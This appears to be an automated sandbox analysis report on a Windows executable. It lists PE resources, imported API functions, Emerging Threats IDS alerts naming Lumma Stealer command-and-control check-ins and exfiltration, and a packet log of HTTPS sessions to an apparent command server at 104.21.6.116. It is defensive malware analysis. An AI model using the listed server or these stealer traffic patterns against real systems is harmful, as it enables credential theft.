                                                                                                              RT_BITMAP0x397b200xa6aDevice independent bitmap graphic, 320 x 16 x 4, image size 2562, resolution 2834 x 2834 px/mEnglishUnited States0.21680420105026257
                                                                                                              RT_BITMAP0x39858c0x152Device independent bitmap graphic, 32 x 16 x 4, image size 258, resolution 2834 x 2834 px/m, 10 important colorsEnglishUnited States0.5295857988165681
                                                                                                              RT_BITMAP0x3986e00x828Device independent bitmap graphic, 32 x 16 x 32, image size 0EnglishUnited States0.4875478927203065
                                                                                                              RT_ICON0x398f080x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.07422059518186112
                                                                                                              RT_ICON0x39d1300x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.08703319502074688
                                                                                                              RT_ICON0x39f6d80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.16463414634146342
                                                                                                              RT_ICON0x3a07800x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.18565573770491803
                                                                                                              RT_ICON0x3a11080x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.3262411347517731
                                                                                                              RT_DIALOG0x3a15700xacdataEnglishUnited States0.7151162790697675
                                                                                                              RT_DIALOG0x3a161c0xccdataEnglishUnited States0.6911764705882353
                                                                                                              RT_DIALOG0x3a16e80x1b4dataEnglishUnited States0.5458715596330275
                                                                                                              RT_DIALOG0x3a189c0x136dataEnglishUnited States0.6064516129032258
                                                                                                              RT_DIALOG0x3a19d40x4cdataEnglishUnited States0.8289473684210527
                                                                                                              RT_STRING0x3a1a200x234dataEnglishUnited States0.4645390070921986
                                                                                                              RT_STRING0x3a1c540x182dataEnglishUnited States0.5103626943005182
                                                                                                              RT_STRING0x3a1dd80x50dataEnglishUnited States0.7375
                                                                                                              RT_STRING0x3a1e280x9adataEnglishUnited States0.37662337662337664
                                                                                                              RT_STRING0x3a1ec40x2f6dataEnglishUnited States0.449868073878628
                                                                                                              RT_STRING0x3a21bc0x5c0dataEnglishUnited States0.3498641304347826
                                                                                                              RT_STRING0x3a277c0x434dataEnglishUnited States0.32899628252788105
                                                                                                              RT_STRING0x3a2bb00x100dataEnglishUnited States0.5703125
                                                                                                              RT_STRING0x3a2cb00x484dataEnglishUnited States0.39186851211072665
                                                                                                              RT_STRING0x3a31340x1eadataEnglishUnited States0.44081632653061226
                                                                                                              RT_STRING0x3a33200x18adataEnglishUnited States0.5228426395939086
                                                                                                              RT_STRING0x3a34ac0x216Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.46254681647940077
                                                                                                              RT_STRING0x3a36c40x624dataEnglishUnited States0.3575063613231552
                                                                                                              RT_STRING0x3a3ce80x660dataEnglishUnited States0.3474264705882353
                                                                                                              RT_STRING0x3a43480x41adataEnglishUnited States0.38095238095238093
                                                                                                              RT_GROUP_ICON0x3a47640x4cdataEnglishUnited States0.8026315789473685
                                                                                                              RT_VERSION0x3a47b00x294OpenPGP Secret KeyEnglishUnited States0.4712121212121212
                                                                                                              RT_HTML0x3a4a440x3835ASCII text, with very long lines (443), with CRLF line terminatorsEnglishUnited States0.08298005420807561
                                                                                                              RT_HTML0x3a827c0x1316ASCII text, with CRLF line terminatorsEnglishUnited States0.18399508800654932
                                                                                                              RT_HTML0x3a95940x8c77HTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.08081426068578103
                                                                                                              RT_HTML0x3b220c0x6acdHTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.10679931238798873
                                                                                                              RT_HTML0x3b8cdc0x679HTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.34339167169583584
                                                                                                              RT_HTML0x3b93580x104aHTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.2170263788968825
                                                                                                              RT_HTML0x3ba3a40x15b1HTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.17612101566720692
                                                                                                              RT_HTML0x3bb9580x2099exported SGML document, ASCII text, with very long lines (659), with CRLF line terminatorsEnglishUnited States0.13732774116237267
                                                                                                              RT_HTML0x3bd9f40x368dHTML document, ASCII text, with CRLF line terminatorsEnglishUnited States0.10834228428213391
                                                                                                              RT_HTML0x3c10840x1d7ASCII text, with CRLF line terminatorsEnglishUnited States0.6008492569002123
                                                                                                              RT_MANIFEST0x3c125c0x813XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.41025641025641024
                                                                                                              DLLImport
                                                                                                              KERNEL32.dllWriteFile, DeleteFileW, HeapDestroy, HeapSize, HeapReAlloc, HeapFree, HeapAlloc, GetProcessHeap, SizeofResource, LockResource, LoadResource, FindResourceW, FindResourceExW, CreateEventExW, WaitForSingleObject, CreateProcessW, GetLastError, GetExitCodeProcess, SetEvent, RemoveDirectoryW, GetProcAddress, GetModuleHandleW, GetWindowsDirectoryW, CreateDirectoryW, GetTempPathW, GetTempFileNameW, MoveFileW, EnterCriticalSection, LeaveCriticalSection, GetModuleFileNameW, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, GetCurrentThreadId, RaiseException, SetLastError, GlobalUnlock, GlobalLock, GlobalAlloc, MulDiv, lstrcmpW, CreateEventW, FindClose, FindFirstFileW, GetFullPathNameW, InitializeCriticalSection, lstrcpynW, CloseHandle, GetLogicalDriveStringsW, GetDriveTypeW, GetDiskFreeSpaceExW, Sleep, LoadLibraryExW, FreeLibrary, GetCurrentProcess, WideCharToMultiByte, GetSystemDirectoryW, GetCurrentProcessId, DecodePointer, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, CreateNamedPipeW, GetExitCodeThread, lstrlenW, VerifyVersionInfoW, VerSetConditionMask, lstrcmpiW, LoadLibraryW, CompareStringW, FindNextFileW, GetFileSize, GetFileAttributesW, GetShortPathNameW, GetFinalPathNameByHandleW, SetFileAttributesW, GetFileTime, CopyFileW, ReadFile, SetFilePointer, SetFileTime, SystemTimeToFileTime, MultiByteToWideChar, GetSystemInfo, WaitForMultipleObjects, GetVersionExW, CreateSemaphoreW, ReleaseSemaphore, GlobalMemoryStatus, GetModuleHandleA, GetProcessAffinityMask, CreateThread, VirtualProtect, VirtualQuery, LoadLibraryExA, GetStringTypeW, OutputDebugStringW, GetLocalTime, FlushFileBuffers, LocalFree, LocalAlloc, SetUnhandledExceptionFilter, FileTimeToSystemTime, GetEnvironmentVariableW, GetSystemTime, GetDateFormatW, GetTimeFormatW, GetLocaleInfoW, FormatMessageW, ConnectNamedPipe, GetEnvironmentStringsW, InitializeCriticalSectionEx, LoadLibraryA, GetModuleFileNameA, GetCurrentThread, GetConsoleOutputCP, Wow64DisableWow64FsRedirection, Wow64RevertWow64FsRedirection, IsWow64Process, SetConsoleTextAttribute, GetStdHandle, GetConsoleScreenBufferInfo, GetTickCount, GetCommandLineW, SetCurrentDirectoryW, SetEndOfFile, EnumResourceLanguagesW, GetSystemDefaultLangID, GetUserDefaultLangID, lstrcpyW, ResetEvent, GlobalFree, GetPrivateProfileStringW, GetPrivateProfileSectionNamesW, WritePrivateProfileStringW, TerminateThread, CompareFileTime, CopyFileExW, OpenEventW, PeekNamedPipe, WaitForSingleObjectEx, ReleaseSRWLockExclusive, AcquireSRWLockExclusive, TryAcquireSRWLockExclusive, FormatMessageA, QueryPerformanceCounter, QueryPerformanceFrequency, SleepConditionVariableSRW, GetLocaleInfoEx, FindFirstFileExW, MoveFileExW, WakeAllConditionVariable, EncodePointer, LCMapStringEx, CompareStringEx, GetCPInfo, GetSystemTimeAsFileTime, IsDebuggerPresent, InitializeSListHead, InterlockedPopEntrySList, InterlockedPushEntrySList, FlushInstructionCache, IsProcessorFeaturePresent, VirtualAlloc, VirtualFree, UnhandledExceptionFilter, TerminateProcess, GetStartupInfoW, RtlUnwind, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, ExitThread, FreeLibraryAndExitThread, GetModuleHandleExW, ExitProcess, GetFileType, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, LCMapStringW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, GetConsoleMode, SetFilePointerEx, GetFileSizeEx, ReadConsoleW, GetTimeZoneInformation, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, FreeEnvironmentStringsW, SetEnvironmentVariableW, SetStdHandle, WriteConsoleW, CreateFileW, HeapQueryInformation
                                                                                                              imagehlp.dllSymGetModuleBase, SymFunctionTableAccess, SymGetLineFromAddr, SymSetSearchPath, SymCleanup, SymInitialize, SymSetOptions, StackWalk
                                                                                                              Language of compilation systemCountry where language is spokenMap
                                                                                                              EnglishUnited States
                                                                                                              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                              2025-01-13T08:34:40.217641+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849707104.21.6.116443TCP
                                                                                                              2025-01-13T08:34:40.897301+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.849707104.21.6.116443TCP
                                                                                                              2025-01-13T08:34:40.897301+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849707104.21.6.116443TCP
                                                                                                              2025-01-13T08:34:41.565036+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849708104.21.6.116443TCP
                                                                                                              2025-01-13T08:34:42.043887+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.849708104.21.6.116443TCP
                                                                                                              2025-01-13T08:34:42.043887+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849708104.21.6.116443TCP
                                                                                                              2025-01-13T08:34:42.738566+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849709104.21.6.116443TCP
                                                                                                              2025-01-13T08:34:43.734959+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849710104.21.6.116443TCP
                                                                                                              2025-01-13T08:34:44.283700+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.849710104.21.6.116443TCP
                                                                                                              2025-01-13T08:34:44.942967+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849711104.21.6.116443TCP
                                                                                                              2025-01-13T08:34:47.431490+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849712104.21.6.116443TCP
                                                                                                              2025-01-13T08:34:48.815217+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849715104.21.6.116443TCP
                                                                                                              2025-01-13T08:34:50.929730+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.849719104.21.6.116443TCP
                                                                                                              2025-01-13T08:34:51.433133+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.849719104.21.6.116443TCP
                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                              Jan 13, 2025 08:34:39.743837118 CET49707443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:39.743879080 CET44349707104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:39.744007111 CET49707443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:39.747968912 CET49707443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:39.747992039 CET44349707104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:40.217508078 CET44349707104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:40.217641115 CET49707443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:40.224004030 CET49707443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:40.224026918 CET44349707104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:40.224361897 CET44349707104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:40.278542995 CET49707443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:40.468514919 CET49707443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:40.468514919 CET49707443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:40.468729973 CET44349707104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:40.897322893 CET44349707104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:40.897571087 CET44349707104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:40.897634983 CET49707443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:40.909452915 CET49707443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:40.909477949 CET44349707104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:40.909491062 CET49707443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:40.909497023 CET44349707104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:41.080955982 CET49708443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:41.080998898 CET44349708104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:41.081069946 CET49708443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:41.081696987 CET49708443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:41.081717014 CET44349708104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:41.564903021 CET44349708104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:41.565036058 CET49708443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:41.566239119 CET49708443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:41.566246033 CET44349708104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:41.566734076 CET44349708104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:41.567994118 CET49708443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:41.568037987 CET49708443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:41.568093061 CET44349708104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:42.043822050 CET44349708104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:42.043888092 CET44349708104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:42.043911934 CET44349708104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:42.043952942 CET44349708104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:42.043970108 CET49708443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:42.043977976 CET44349708104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:42.043992996 CET44349708104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:42.043998957 CET49708443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:42.044024944 CET49708443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:42.044034958 CET44349708104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:42.044118881 CET44349708104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:42.044316053 CET49708443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:42.044322968 CET44349708104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:42.048738003 CET44349708104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:42.048799992 CET49708443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:42.048806906 CET44349708104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:42.090174913 CET49708443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:42.090183973 CET44349708104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:42.134427071 CET44349708104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:42.134478092 CET49708443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:42.134486914 CET44349708104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:42.134593010 CET44349708104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:42.134675980 CET49708443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:42.134682894 CET44349708104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:42.134803057 CET44349708104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:42.134845018 CET49708443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:42.134865046 CET44349708104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:42.134876013 CET49708443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:42.134882927 CET44349708104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:42.134890079 CET49708443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:42.134892941 CET44349708104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:42.274913073 CET49709443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:42.274939060 CET44349709104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:42.275088072 CET49709443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:42.275566101 CET49709443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:42.275579929 CET44349709104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:42.738486052 CET44349709104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:42.738565922 CET49709443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:42.739835024 CET49709443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:42.739842892 CET44349709104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:42.740628004 CET44349709104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:42.741915941 CET49709443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:42.742037058 CET49709443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:42.742074966 CET44349709104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:43.139072895 CET44349709104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:43.139379978 CET44349709104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:43.139425993 CET49709443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:43.140496969 CET49709443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:43.140502930 CET44349709104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:43.269092083 CET49710443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:43.269125938 CET44349710104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:43.269212008 CET49710443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:43.269581079 CET49710443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:43.269593000 CET44349710104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:43.734883070 CET44349710104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:43.734958887 CET49710443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:43.736386061 CET49710443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:43.736391068 CET44349710104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:43.736713886 CET44349710104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:43.737982988 CET49710443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:43.738197088 CET49710443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:43.738240957 CET44349710104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:43.738461971 CET49710443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:43.779336929 CET44349710104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:44.283803940 CET44349710104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:44.284086943 CET44349710104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:44.284203053 CET49710443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:44.284419060 CET49710443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:44.284430027 CET44349710104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:44.478754044 CET49711443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:44.478787899 CET44349711104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:44.478929996 CET49711443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:44.479360104 CET49711443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:44.479374886 CET44349711104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:44.942883015 CET44349711104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:44.942966938 CET49711443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:44.944283962 CET49711443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:44.944288969 CET44349711104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:44.944669962 CET44349711104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:44.946824074 CET49711443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:44.946994066 CET49711443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:44.947031021 CET44349711104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:44.947083950 CET49711443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:44.947091103 CET44349711104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:45.843880892 CET44349711104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:45.844127893 CET44349711104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:45.844202995 CET49711443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:45.844796896 CET49711443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:45.844809055 CET44349711104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:46.952325106 CET49712443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:46.952387094 CET44349712104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:46.952508926 CET49712443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:46.952852011 CET49712443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:46.952872038 CET44349712104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:47.431412935 CET44349712104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:47.431489944 CET49712443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:47.432924986 CET49712443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:47.432934999 CET44349712104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:47.433326960 CET44349712104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:47.434623957 CET49712443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:47.434720993 CET49712443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:47.434726954 CET44349712104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:47.868236065 CET44349712104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:47.868369102 CET44349712104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:47.868459940 CET49712443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:47.868635893 CET49712443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:47.868658066 CET44349712104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:48.344707012 CET49715443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:48.344799042 CET44349715104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:48.344892025 CET49715443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:48.345190048 CET49715443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:48.345230103 CET44349715104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:48.815006971 CET44349715104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:48.815217018 CET49715443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:48.816317081 CET49715443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:48.816348076 CET44349715104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:48.816605091 CET44349715104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:48.823411942 CET49715443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:48.824193001 CET49715443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:48.824233055 CET44349715104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:48.824434042 CET49715443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:48.824482918 CET44349715104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:48.824640036 CET49715443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:48.824700117 CET44349715104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:48.824851990 CET49715443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:48.824909925 CET44349715104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:48.825129032 CET49715443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:48.825174093 CET44349715104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:48.825366020 CET49715443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:48.825433016 CET44349715104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:48.825468063 CET49715443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:48.825481892 CET44349715104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:48.825506926 CET49715443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:48.825519085 CET44349715104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:48.825647116 CET49715443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:48.825696945 CET44349715104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:48.825737000 CET49715443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:48.825817108 CET49715443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:48.825869083 CET49715443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:48.834551096 CET44349715104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:48.834753990 CET49715443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:48.834810972 CET44349715104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:48.834834099 CET49715443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:48.834861994 CET44349715104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:48.834933996 CET49715443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:48.839122057 CET44349715104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:50.385369062 CET44349715104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:50.385445118 CET44349715104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:50.385535955 CET49715443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:50.385669947 CET49715443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:50.385694981 CET44349715104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:50.465569973 CET49719443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:50.465603113 CET44349719104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:50.465766907 CET49719443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:50.466089964 CET49719443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:50.466103077 CET44349719104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:50.929644108 CET44349719104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:50.929729939 CET49719443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:50.930975914 CET49719443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:50.931000948 CET44349719104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:50.931946039 CET44349719104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:50.933188915 CET49719443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:50.933190107 CET49719443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:50.933377028 CET44349719104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:51.433192015 CET44349719104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:51.433470011 CET44349719104.21.6.116192.168.2.8
                                                                                                              Jan 13, 2025 08:34:51.433563948 CET49719443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:51.433697939 CET49719443192.168.2.8104.21.6.116
                                                                                                              Jan 13, 2025 08:34:51.433706999 CET44349719104.21.6.116192.168.2.8
